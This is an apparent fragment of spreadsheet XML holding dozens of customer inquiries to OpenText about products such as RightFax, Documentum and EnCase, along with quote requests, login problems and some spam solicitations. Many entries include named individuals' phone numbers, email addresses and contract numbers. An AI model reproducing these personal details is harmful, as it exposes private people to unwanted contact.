To that, i am willing to help and patiently waiting for your response._x000D_
 _x000D_
_x000D_
Cheers,_x000D_
_x000D_
Ian</t>
  </si>
  <si>
    <t>We are looking to retire the FileNet Image services System here in Bechtel and are looking for alternatives. We are looking for more information about Documentum to see if it was a possible solution for us.</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We have upgarded the OTEXVIM 7.5 from SP7 to SP8 on our ECC system._x000D_
After the upgrade of the component through SPAM we have installed the below 2 post installation transports as per the release note._x000D_
_x000D_
EW3K901581_x000D_
D9PK901941_x000D_
_x000D_
The first transport has imported with RC 0 however the second one (D9PK901941) has ended with an RC - 8._x000D_
Below is the error log for this transport. Could you please check and suggest if any correction action needs to be taken or imported for this transport ended with RC - 8._x000D_
_x000D_
  ######################################_x000D_
  Main import_x000D_
  Transport request   : D9PK901941_x000D_
  System              : TR4_x000D_
  tp path             : tp_x000D_
  Version and release: 381.20.90 753_x000D_
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Table /OTX/PF62_T_PLDA is not in nametab_x000D_
 Main import_x000D_
 End date and time : 20190208091432_x000D_
 Ended with return code:  ===&gt; 8 &lt;===_x000D_
 ######################################_x000D_
_x000D_
Our Development team has checked on this and they confirmed that the above table does not exist in the system. Please advise._x000D_
_x000D_
Thanks &amp; regards,_x000D_
Anamika</t>
  </si>
  <si>
    <t xml:space="preserve">I am a driver and general worker I am looking for a job </t>
  </si>
  <si>
    <t xml:space="preserve">Im not sure what's this all about but please call 916-886-1330. My email is strictly confidential information Superhero.1.tennille. romero@gmail.com. </t>
  </si>
  <si>
    <t>I want to give Encase certificate exam in Ontario, Canada. I have MSc in Digital Forensics and Cyber crime Analysis from StaffordShire University,UK.  I was not able to do this certification when I finished my course in 2017. Now I have moved to Canada and I am about to finish my studies at Centennial College. I would like to know the testing centre locations in Ontario , Canada.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm with EDI for Coyote Logistics. We have a VAN connection setup with you for Clearwater Paper. I've copied the connection structure below. We are currently testing data back and forth but we're unable to get data to and from successfully like we were previously. Our partner is looking for the mailbag number for the transactions we've sent but we don't have access currently to where this data is. _x000D_
_x000D_
Would you be able to assist?_x000D_
_x000D_
Thank you!_x000D_
Josh_x000D_
_x000D_
Clearwater &lt;&lt;&gt;&gt; Coyote_x000D_
 _x000D_
782437318/01 &lt;&lt;&gt;&gt; CLLQ/02 _x000D_
782437318/01 &lt;&lt;&gt;&gt; COYY/02_x000D_
</t>
  </si>
  <si>
    <t>Requesting quote - _x000D_
CLIN	MFG	Part NO.	Description	IUID (Y/N)	QTY_x000D_
1	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 09792-12450_x000D_
Contract A223774_x000D_
49.21/unit_x000D_
"	N	58_x000D_
2	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Single License (Electronic) Maintenance 1000034963_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 09792-12450_x000D_
Contract A223774_x000D_
5.96/unit_x000D_
"	N	58_x000D_
3	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 09802-12450_x000D_
Contract A223774_x000D_
49.21/unit_x000D_
"	N	150_x000D_
4	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Single License (Electronic) Maintenance 1000034963_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 09802-12450_x000D_
Contract A223774_x000D_
5.96/unit_x000D_
"	N	150_x000D_
5	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 40322-12419_x000D_
Contract 5632_x000D_
48.87/unit_x000D_
"	N	26_x000D_
6	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Single License (Electronic) Maintenance 1000034963_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 40322-12419_x000D_
Contract 5632_x000D_
5.92/unit_x000D_
"	N	26_x000D_
7	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 52738-12411_x000D_
Contract 26409_x000D_
$49.21/unit_x000D_
"	N	2_x000D_
8	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Single License (Electronic) Maintenance 1000034963_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 52738-12411_x000D_
Contract 26409_x000D_
$5.96/unit_x000D_
"	N	2_x000D_
9	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 54738-12402_x000D_
Contract 26837_x000D_
$49.21_x000D_
"	N	42_x000D_
10	OPENTEXT	S-EXMPI550101M_M	"Exceed Single License (Electronic) Maintenance 1000025395_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 54738-12402_x000D_
Contract 26837_x000D_
$49.21_x000D_
"	N	29_x000D_
11	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Single License (Electronic) Maintenance 1000034963_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 54738-12402_x000D_
Contract 26837_x000D_
$5.96/unit_x000D_
"	N	42_x000D_
12	OPENTEXT	S-SPMPI570101M_M	"Secure Shell Sin</t>
  </si>
  <si>
    <t>Hi, Second attempt to try and get in touch with someone, unfortunately phone contact did not work. I am manager of DevOps team, and am looking for an insight smart search tool that can help us perform smart searches through multiple databases of our enterprise applications, and correlate and do results in a way that can help investigating officers look for clues and information from different systems. Could someone please get in touch with me to discuss if you could help. This is a fairly fast paced requirement so a quick response will be appreciated. Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
For some reason I can't submit my ticket so if you're able to reach out via email I can reply there with my enquiry._x000D_
_x000D_
Thanks,_x000D_
Andrew</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I have used DM in the past and thought it was a great management software.  I have started at a new smaller firm and was curious about what it would take to get DM here.  </t>
  </si>
  <si>
    <t>Hello, I am requesting your assistance tin obtaining login info for our account. The person who used to handle this account is out on leave, so that info in unknown. We have used OpenText to upload products to the Macy's catalogue. Thank you! - Bonnie</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of an AD server migration project at our St Francis Hospital in Columbus GA._x000D_
We have 2 servers that make up our Rightfax system and we are trying to determine the requirements if we wanted to move it from the existing domain to the Lifepoint domain._x000D_
Is there technical documentation or someone we could speak with to make sure we understand what needs to be done if we were to move it?_x000D_
Thank you for your time and help._x000D_
Sincerely,_x000D_
Scott Burke_x000D_
scott.burke@lpnt.net, 615-920-7083_x000D_
</t>
  </si>
  <si>
    <t>I have an Guidance Software Endpoint Investigator SAFE that had failed and required a re-stage.  It was at version a05 which I found out was 3 revisions behind.  So I restored the Application folder and ran the install for a08 to upgrade the components using information from the keymaster.PrivateKey.  I have no way to send the new "SAFE Token File" to as apparently I'm not authorized to do so._x000D_
_x000D_
After having direct support access for these type of issues since 2004 this is extremely frustrating to be told I'm this close to having access, which after performing an email verification never happens._x000D_
_x000D_
In any case I am at a screen telling me that "after obtaining the file BlahBlah.setup, Click Finish on the next screen". _x000D_
_x000D_
How do I get approval to complete my SAFE Install.  I also will be needing to upgrade our version of eDiscovery  in the next couple of months._x000D_
_x000D_
Thank You,_x000D_
_x000D_
David Watts_x000D_
AMFAM</t>
  </si>
  <si>
    <t>I'm interested in learning more about Teamsite.</t>
  </si>
  <si>
    <t>Looking to convert my current RightFax On Prem Solution to a Hosted Solution</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon! _x000D_
_x000D_
Any chance you could suggest the best person to speak to about OpenText’s  community involvement and/or corporate engagement activities here at the local level (Peterborough, ON)? _x000D_
_x000D_
Thank you so much,_x000D_
Emily Ferguson_x000D_
</t>
  </si>
  <si>
    <t>Is it possible to password protect a composed email before you send to a recipient?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested to get in touch with all top decision makers for Call Centers and business centers Industry._x000D_
_x000D_
Call centers Users:- Automatic call distributor Users, Business process outsourcing Users, Contact center partners, Call managements, Erlangen distribution, List of call Centre companies, Predictive dialing, Operator messaging, inbound calls, Queue management system, Skills based routing, call processing, fulfillment and distribution, intelligent call routing, Virtual queue, meet-me conference call, busy hour call completions(bhcc), compellent storage center, intelligent call processing(ICP) and many more._x000D_
_x000D_
Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry : _x000D_
Target Geography : _x000D_
Target Job Title : _x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Kevin Daniels</t>
  </si>
  <si>
    <t>I would like pricing on this solution and an explation of what this replaces.  Regards,_x000D_
Nate</t>
  </si>
  <si>
    <t>I am gathering information from multiple case management platforms to understand which software will best fit my company needs. We use 4 existing platforms to manage different forms of communication with our customers. I am looking for a case management system that will integrate all 4 of these platforms to, 1. track all customer communications in a centralized location, and 2. create actions based on these interactions. Approximately 10 employees will need access to this case management system, to monitor around 1 million cases (customers). Please get back to me with more information ASAP. Thank you.</t>
  </si>
  <si>
    <t>Hi, _x000D_
Central computer is an authorized reseller for City and county of San Francisco._x000D_
The Human Service Agency requested a few maintenance items._x000D_
 Quantity	Product	Product #_x000D_
1100	WebReports Maintenance 05/01/2019 to 4/30/2020	1000034135 (S-PSOWEBRPT_M)_x000D_
1	Content Server Protect Anytime 05/01/2019 to 04/30/2020	1000030326 (S-LL-CS-24X7RESTORE)_x000D_
1700	Advanced Workflow Read-Only Named Users Maintenance_x000D_
05/01/19 to 04/30/20	1000030855_x000D_
(S-LLPGECMADVWFREAD_M)_x000D_
100	Advanced Workflow Full Named Users Maintenance _x000D_
05/01/19 to 04/30/20	1000030856_x000D_
(S-LLPGECMADVWF_M)_x000D_
1900	Content Suite Platform Read Only Named Users Maintenance_x000D_
05/01/19 to 04/30/20	1000030877_x000D_
(S-LLPGECMCLMREAD_M)_x000D_
1	Release Script for Kofax Capture Production Maintenance _x000D_
05/01/19 to 04/30/20	1000030401_x000D_
(S-LLCAPRLS_M)_x000D_
1000	Document Management Full Named Users Maintenance _x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 63161-12248 Unique Name: 63161-12248	1000030892_x000D_
(S-LLPGECMDM_M)_x000D_
100	Content Suite Platform Standard Named Users Maintenance_x000D_
05/01/19 to 04/30/20_x000D_
Unique #: 63161-12248 Unique Name: 63161-12248	1000030882_x000D_
(S-LLPGECMCLM_M)_x000D_
_x000D_
Can you give us a quote?_x000D_
Thanks _x000D_
Harris</t>
  </si>
  <si>
    <t>Looking for pricing info for your Fax solution.</t>
  </si>
  <si>
    <t>Does CXL support .png files and bitmap files?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm attempting to sign up on the "Become a Developer" page, but it's asking for my country without giving me a box to enter it in.  Help!_x000D_
</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I'm writing to follow up on a voicemail I left with support yesterday but I haven't been called back yet._x000D_
_x000D_
I am new to the job I am doing and we use OpenText DM as our records management system.  I have been running into trouble with DM integration with Office 2010 on a Windows 10 x64 bit machine.  The Word and Excel add-ins are broken due to runtime errors and when opening either application they are crippled due to a persistent error message stating:  "Reconnecting DM integration.  You may need to re-save your work."_x000D_
_x000D_
This is the second time this has happened on 2 different machines of identical hardware and software for no apparent reason.  DM integration was working properly, went home, came back in the morning to these errors.  Both times it was a yesterday it worked and today it didn't scenario.  We are trying to deploy this hardware but this error would be crippling to the operations so I need to get the issue identified before our desktop roll-out project can proceed.  I worked with our Concerta DM contractor on it and he could not figure it out.  It appears there is something wrong with the add-ins themselves and perhaps you have an FTP site where I can snag Windows 10 compatible add-ins?_x000D_
_x000D_
Anyway, I'd really appreciate hearing back from someone.  We have an active support contract with you and your assistance would be greatly appreciated._x000D_
_x000D_
Thank you in advance for your time and effort._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Adam Breckels | Business Application Analyst _x000D_
City of Pitt Meadows_x000D_
Phone: 604.465.2431</t>
  </si>
  <si>
    <t>Unable to use (Forgot your password) on "WebEx Network Recording Player" it goes to a "Page not Found"</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I have reached out now multiple times without a response for someone to contact me regarding a demo. My company is currently on Actuate the previous version of Opentext. We would like to discuss and give your company the opportunity to provide us your software. Please email me to set up a discussion to talk requirements. If I don't hear back again we will assume you are uninterested in our business. </t>
  </si>
  <si>
    <t xml:space="preserve">I need the United Tech. sales rep to call or email me asap. </t>
  </si>
  <si>
    <t>Could you please provide me with a POC to request a quote for RFQ #19-1300763011 SPAWAR Atlantic on the attached RFQ as soon as possible? All pertinent details – including contact information – are below. Thank you and please let me know if you have any questions._x000D_
_x000D_
_x000D_
Alex Steiner_x000D_
Sales Associate at Microtech _x000D_
8330 Boone Blvd # 600, Vienna, VA 22182_x000D_
571-327-2924</t>
  </si>
  <si>
    <t>My company is looking to support Digital Forensics and Incident Response in a cloud environment; does OpenText have a solution for supporting Forensics and Incident Response from a cloud perspective?_x000D_
_x000D_
Thanks for your time and assistance.</t>
  </si>
  <si>
    <t>What is the process of registering for an on-demand class using a Passport?</t>
  </si>
  <si>
    <t>We are upgrading to Rightfax version 16.4 and we were told by our OneTouch consultants we need to download the Client Install prerequisites from you sight.  It appears I do not have access to the download support section.  Please let me know how I can obtain access to the downloads._x000D_
Thanks,_x000D_
Herman</t>
  </si>
  <si>
    <t>Client is facing multiple issues as listed below. Please let us know what we can do to avoid/fix them:_x000D_
1. To field in the Fax Cover Sheet is not getting populated_x000D_
2. We want to know what the Company field in the Cover Sheet refers to._x000D_
3. Font of the Notes (HTML Email that was sent) is not same and has changed. Font size appears to be small at some places._x000D_
_x000D_
Please help us with a quick resolution of all these issues as we need to go live with this in the start of next week.</t>
  </si>
  <si>
    <t xml:space="preserve">Do I have technical support ?  Here is my agency last renewal information:_x000D_
Renewal Notice_x000D_
Date: 5/1/18_x000D_
Reference Number: RC270355_x000D_
Contract Number: 0012235168_x000D_
Maintenance Term Start Date: 6/6/18_x000D_
Maintenance Term Expiration Date: 6/5/19_x000D_
Quote Expires: 6/5/18_x000D_
Payment Terms: Net 30_x000D_
Previous PO Number: 4000233382_x000D_
</t>
  </si>
  <si>
    <t>Good Afternoon, Can I request that our company contact details are updated to set ian.ross@kettle.co.uk instead of chris.orr@kettle.co.uk</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I have issues with plug ins of Entreprise Connect. GIS has installed them on my machine but they have dissapeared. When I tick the box for the Outlook plug in for instance, it is not taken into account. Could you please check this ? We are currently doing User Acceptance Tests and need to move forward with Entreprise Connect. _x000D_
Thanks a lot!_x000D_
Svitlana Petit </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have recently purchased x4 Tableau TX1 units, however we are experiencing issues with them._x000D_
_x000D_
The issue is that the TX1 will not detect Bitlocker encrypted USB's or HDD's although the product is said to be capable of doing this on your website._x000D_
_x000D_
The firmware version on the TX1's are also up to date as they are running on version 2.1 which is the version installed on the TX1 as default and has not been changed. _x000D_
_x000D_
I have attempted to image a drive and during the process it says it has encountered errors. Furthermore, by looking at the "whole disk encryption" part in the log it says "none detected. It also says this for the log that is generated when a blank disk check is performed too._x000D_
_x000D_
I'm not sure if this is a bug related issue with the latest firmware. Is there an explanation behind why the TX1's cannot detect Bitlocker at all even though they are supposed to?_x000D_
_x000D_
I look forward to hearing from you.</t>
  </si>
  <si>
    <t>We have SF as our CRM and ERP, and we are introduccion sharepoint as our file storage management. We would like to have Microsoft Sharepoint embedeed into SF, and with SP metadata and SF fields from Objects standard and customized mappned</t>
  </si>
  <si>
    <t>testing-web team</t>
  </si>
  <si>
    <t>We are looking for a drawings collaboration software and are interested in Brava!. Can you please send me pricing information for Brava!?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We sold for our customer "Universidad Autónoma de Bucaramanga" Encase Forensic solution, it was purchased trough Digital Intelligence, unfortunately the email of the client that was registered is no longer available, so the data and instructions for registration and installation is not available._x000D_
_x000D_
How can we get that information again?, when we try to register, the form ask for "Product Line", "End User Number", "Name of co-worker", "System ID/serial number/PIN/VPS"; but the customer didn't receive it._x000D_
_x000D_
Customer information:_x000D_
End User:  Elsy Paez Ortiz_x000D_
Universidad Autonoma de Bucaramanga_x000D_
Email:  compras@unab.edu.co  (this email is not available right now)_x000D_
_x000D_
Thanks a lot for your help.</t>
  </si>
  <si>
    <t>We have a user who is unable to redact all pages in larger documents.  If she redacts 30 pages of an 80 page document, she can't proceed past that point.  Thank you for your assistance.</t>
  </si>
  <si>
    <t>We do not have current support on Rightfax. I want to get an idea of what support levels you offer for this application with some pricing.</t>
  </si>
  <si>
    <t>I would like to talk to someone in your Public Sector Business Development group.  I would like to talk about teaming with your company for some DLA work._x000D_
_x000D_
Thanks_x000D_
_x000D_
Sanjay Magoon_x000D_
703-314-6071_x000D_
sanjaymagoon@ctech-sys.com</t>
  </si>
  <si>
    <t>We've been using an Rightfax for a couple of years now on an instance of Windows Server 2008 R2. We are working on migrating all of our servers to Windows Server 2016. Can you confirm if RightFax works on Windows Server 2016? Will our licenses still work etc etc?_x000D_
_x000D_
Thanks in advance,_x000D_
David Salazar</t>
  </si>
  <si>
    <t>Hello, I have been looking on your website for an evaluation of the Captiva web toolkit, as I would like to see if it may be suitable for adding web scanning capabilities to some work which is upcoming on our development road map._x000D_
_x000D_
I have not been able to find a download link to this product.  Are you able to provide a download link so I can evaluate it please?_x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Andy Gleed</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
_x000D_
I was just curious as so the # of attendees to the conference as well as the price of activation or booth setup for a regular 10x10 booth? </t>
  </si>
  <si>
    <t>Receiving "spam" faxes,  how can these be prevented?  Also, I'm unable to log into my admin account, F2M/JNEDELA .  I select password reset but have not received an email.</t>
  </si>
  <si>
    <t>bonjour , _x000D_
_x000D_
est ce que spark sql utilise votre grammaire pour le parsing des requetes? je vient de trouver ce document et je me demande si cette grammaire est la grammair de SqlBase :_x000D_
in github : apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4_x000D_
 elle est utilisé par spark._x000D_
_x000D_
merci pour votre reponse . _x000D_
sinceres salutations _x000D_
Asma ZGOLLI</t>
  </si>
  <si>
    <t>I want to find out how to become a parter with open text to resell VAN connectivity. I would like to look into setting up a direct AS2 and/or FTP setup to pass the data through to open text from my clients I would like to switch VAN services.</t>
  </si>
  <si>
    <t>We would like to see what options are available for setting up a virtual faxing system.  We currently use Rightfax  with our GE RIS system and used to use it with our Hyland OneContent application (formerly Mckesson HPF) which is the main focus for this inquiry.  We would like to setup a call to discuss options.  Can someone please put us in contact with the correct person or dept?</t>
  </si>
  <si>
    <t xml:space="preserve">The Brava license manage create a log file that has 4 columns. The first is the users ID the second is the client computer IP, The third is a long Integer, and the last is a date time stamp._x000D_
My question are on the third and forth columns. What is the third column integer and what event sets the forth column (license check out or check in)? </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I need to download xCP Designer 2.2.18. ".18" is important._x000D_
Can you tell me the download link?_x000D_
_x000D_
Best regards,_x000D_
Alfonso García.</t>
  </si>
  <si>
    <t>Hi._x000D_
I am an Aktive Reply employee and I currently develop using Opentext technology, but I am not able to access Opentext knowledge anymore.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We have 1432 Ready-To-Buy Vmware Technology Customers List from UK_x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
 _x000D_
 _x000D_
Thank You,_x000D_
Regards,_x000D_
Janet Chua_x000D_
Marketing Director _x000D_
Techno-nest_x000D_
Email: janet.chua@techno-nest.com</t>
  </si>
  <si>
    <t>Hi my name is Amelia. _x000D_
I am looking for new acquaintances to sometimes have fun. _x000D_
Write me on my email if you like sometimes to fool around. _x000D_
We will find how to spend time)) _x000D_
amelia1986g@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Get a 'Web server error' when logged in. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
A quick one: Does Application Governance &amp; Archiving for Microsoft SharePoint (AGA) support modern SharePoint experience? _x000D_
_x000D_
In other words, can we use AGA with (on-prem) SharePoint 2019 , especially with MODERN libraries? _x000D_
_x000D_
Thank you very much_x000D_
_x000D_
 Regards_x000D_
  Kristian </t>
  </si>
  <si>
    <t>We have an urgent opportunity to propose and implement an Enterprise Content Management (ECM) Solution, aimed at digitizing records and automating workflow processes in order to improve information sharing and collaboration across the public sector of the Federal Government of Nigeria._x000D_
I would appreciate if I can get specific and concise resources that cover the specified solution above. Hoping to hear from you soonest as this is very urgent._x000D_
Many thanks and God bless!</t>
  </si>
  <si>
    <t>How to apply license in opentext Excced. Throurgh Register online.</t>
  </si>
  <si>
    <t>I have received an email "Registration Confirmation" yesterday to finalize my account creation I clicked on the link provided, typed my new password and verify password but when clicking on "update password" it says "An error occurred updating password"._x000D_
Please could you help?</t>
  </si>
  <si>
    <t xml:space="preserve">I hold an active EnCE and would like to understand the number of CPEs i receive when i complete EnCE. </t>
  </si>
  <si>
    <t>When I try to logon to the Knowledge Center with my user and password, I get always the information "Almost there! Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.". I get the mail to confirm and when I I try to logon the same happens._x000D_
_x000D_
Regards, Martin Petsch</t>
  </si>
  <si>
    <t>Hi, i can't find the EnCase-Forum. Please send me a link!</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen,_x000D_
We are working with the Software EnCase (Guidance). In the past we had access to the EnCase-Forum. How can we get access to the EnCase-Forum within OpenText?_x000D_
I have created an user-account and got an E-Mail with this text:_x000D_
Dear Gerhard Tippner, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
•	Your User ID: g.tippner@comfor-it.de_x000D_
But when I click on "My Support" I get the message:_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Regards,_x000D_
Gerhard Tippner_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir suche nach einer Lösung um unsere in Sharepoint 2016, OnPremise später hybrid Cloud, abgelegten Daten revisionssicher zu speichern._x000D_
_x000D_
Können Sie mir bitte Produktinformationen zukommen lassen und einen Ansprechpartner nennen, der uns zum Produkt technisch beraten kann, Rückfragen gerne via Mail._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
i. A. Michael Stuhler_x000D_
Daten- &amp; Systemmanagement_x000D_
</t>
  </si>
  <si>
    <t>Hello, Magnox use Opentext and our current partner in the uK is Clarity.  Howvere my organisation require that we show competition on all services and I need another quote for the same services via an alternate supplier.  Can you provide a quote directly or get another reseller to quote me please?_x000D_
_x000D_
eDOCS DM Standard Named User Client 179_x000D_
eDOCS DM Imaging Imaging Client 179_x000D_
eDOCS RM Admin Tool 2_x000D_
eDOCS RM Standard Named User Client 73</t>
  </si>
  <si>
    <t xml:space="preserve">Dears,_x000D_
    Can you a give a trial license for Open Test Exceed Version 15. How much will it cost to buy 31 licenses?_x000D_
     Best regards._x000D_
</t>
  </si>
  <si>
    <t>Hello Sir/Madam , _x000D_
 _x000D_
Greetings from Beroe Inc. _x000D_
  _x000D_
I am Shyam, Lead Procurement Research Analyst – Software and IT Services, Beroe Inc. _x000D_
Beroe is the global leader and the preferred partner for procurement intelligence for Fortune 500 clients, and manages over US $15 Billion globally. _x000D_
Our recommendations have supported clients to drive supplier decisions of over 300+ direct &amp; indirect spend categories._x000D_
 _x000D_
Beroe has been engaged by a Fortune 500 Technology player head quartered in USA to identify e-discovery solution providers on their behalf. _x000D_
 _x000D_
We have identified your firm as one of the potential supplier to participate in this exercise. _x000D_
 _x000D_
Kindly note that we are submitting our initial findings to them as a First phase of this procurement process on Thursday 07th February 2019_x000D_
 _x000D_
The key information which our client requires is: _x000D_
_x000D_
•	Experience of working with Fortune 500 Firms _x000D_
•	Global Presence _x000D_
•	Solutions features and pricing information_x000D_
_x000D_
Kindly note that we will be sharing your contact details, along with your inputs to our client so that our client could reach out to the right stakeholders from your side, directly.  _x000D_
 _x000D_
Hence we look forward to your confirmation to participate in this exercise. _x000D_
_x000D_
Please revert with your inputs at the earliest considering the project being an immediate procurement initiative._x000D_
 _x000D_
Thank you in advance for the understanding and support. _x000D_
_x000D_
Thanks &amp; Regards_x000D_
Shyam Sundar M_x000D_
Lead Analyst, Software &amp; IT Services_x000D_
_________________________________________x000D_
Beroe Consulting (I) Pvt. Ltd. | Ground Floor, ASV Chandilya Towers, Rajiv Gandhi Salai, Thoraipakkam, Chennai – 600097 | _x000D_
Mobile : +919677446421 |</t>
  </si>
  <si>
    <t>Hi, we are looking for an enterprise smart search capability to search through our internal application databases, could someone get in touch with me to discuss further. Cheers</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am Kevin from Aboitiz Equity Ventures Inc., Aboitiz Group is one of the oldest conglomerates here in the Philippines.  We are currently transforming the business to digital and we are searching for best content services platform / ECM for the company._x000D_
We would like to hear what your company can offer. _x000D_
_x000D_
I hope to hear from you soon._x000D_
_x000D_
Thanks! </t>
  </si>
  <si>
    <t>Hi_x000D_
I am Sanjeev  from a leading Search Engine Optimization (SEO) Company based in India._x000D_
As per the trends in your industry - over 80% of people search for your products/services online and buy the same.      _x000D_
1. Would you like to increase the leads / sales generated from your website?_x000D_
2. Do you want Google promotion Service in Affordable price? _x000D_
3. Would you like to be listed at the top of every major search engine such as Google, Yahoo! &amp; Bing for multiple search phrases (keywords) relevant to your products / services?_x000D_
It would be recommended if you go for search engine optimization (SEO) for your website which would increase your web visibility and generate better prospect traffic to your website._x000D_
There is a simple equation that is applicable to the online world._x000D_
Ethical SEO = Better Traffic Higher Sales_x000D_
Do let me know if you are interested and it shall be our pleasure to give you Details about our services, Price list and Offers._x000D_
I look forward for your reply. _x000D_
----------------------_x000D_
Kind Regards,_x000D_
Sanjeev Yadav</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am interested in OpenText Documentum XCP if i can get more information about this product such as: quotation and price</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I used to work for Chrome Consulting and took and VIM certification course in or around September 2015._x000D_
_x000D_
I am not able to find the certificate given to me back then. Is it possible to get a copy?_x000D_
_x000D_
Thanks,_x000D_
Robert Bruhn_x000D_
+61 477 073 343</t>
  </si>
  <si>
    <t>Dear Entrepreneur,_x000D_
Greeting and Hope your day is going well._x000D_
If you like to know some of the most important reasons why you are lagging behind the expected traffic and online business from your website that  you are looking for, then we will dedicatedly help you out to boost your website ranking on the major search engines as well as increase the online visibility of your website._x000D_
_x000D_
If you want to get more gain in the online business from your website, then do reply to us. We will send you the future details and a “detail website audit report” of your website that will help you to know how your website functioning in the online race._x000D_
As an expert, I can assure you that we can deliver the promising result in the online field that you are eagerly looking for._x000D_
Looking forwards for your kind response…_x000D_
_x000D_
Best Regards,_x000D_
Nisha Sharma_x000D_
Digital Branding Expert_x000D_
Email: nisha.digitalexpert@hotmail.com_x000D_
STB057/02</t>
  </si>
  <si>
    <t>Please update me about the training for which I have registered on 4th feb 2019 monday.</t>
  </si>
  <si>
    <t>I will need to develop API for ETX system.  As long as I checked on the help, there is API document which is like Exceed TurboX REST API User Guide.  Where can I get this document?  Please let me know.</t>
  </si>
  <si>
    <t>Hi OT,_x000D_
I'm trying to login to MySupport to no avail. I'm getting the following error even after responding to confirmation email:_x000D_
_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.</t>
  </si>
  <si>
    <t>I would like to know if OpenText has any resources translated in Chinese? I have a user guide done by OpenText in English but because we are doing a roll-out in China, I would like to know if the guide can be translated into Chinese or you guys already have a copy in your Archive. Unfortunately I can't attach the document here but feel free to drop me an email so that I can forward you the existing documentation that I have to show you what I mean.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi , We are accessing systems for implementing a document management system and are considering various tools of which Opentext is one of them . please get in touch with me to hear more on our requirements and also to showcase Opentext capabilities ._x000D_
Regards,_x000D_
Sonnad_x000D_
03 9609 9718 </t>
  </si>
  <si>
    <t>I would like to learn a little more about Open Text Fax solutions for a healthcare provider.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to add a new communication method to TrustedLink. The previous computer we had the application on used get2connect, but that is not an option on the new install. Also we need the new PC to have the same access to files/databases as that previous PC. </t>
  </si>
  <si>
    <t>Buenas tardes, estamos interesados en los productos OpenText que ofrecen soluciones de administración de contenidos y documentos. Podrían enviarnos información y costos al respecto? Muchas gracias.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for quotation for Business Intelligence Query Admin &amp; User 32Bit (English) Maintenance &amp; Support for the period of April 1, 2019 to March 31, 2020. _x000D_
_x000D_
Could you provide pricing or a good contact for quoting?_x000D_
_x000D_
thank you,</t>
  </si>
  <si>
    <t>I was referred to you via our Skechers rep (acct ref#123107989611) who said you might be able to provide me with a master list of their UPCs &amp; product codes? We sell a lot of Skechers shoes and this info would help input them into our computer system. Thank you</t>
  </si>
  <si>
    <t>Hello, I would like to talk to someone reference "On Demand" training for EnCase Forensics._x000D_
Thank you!_x000D_
Jake</t>
  </si>
  <si>
    <t>Id like to know the private pricing for 5-10 people for DF210 and df310.  Thanks.</t>
  </si>
  <si>
    <t>I'd like to know the rates for private training.  Specifically for DF210, and df320.  If i had a group of 5-10 people how much would that cost.  Thanks.</t>
  </si>
  <si>
    <t>We would like a demo of your ECM product for document composition, ETL and print/mail production.</t>
  </si>
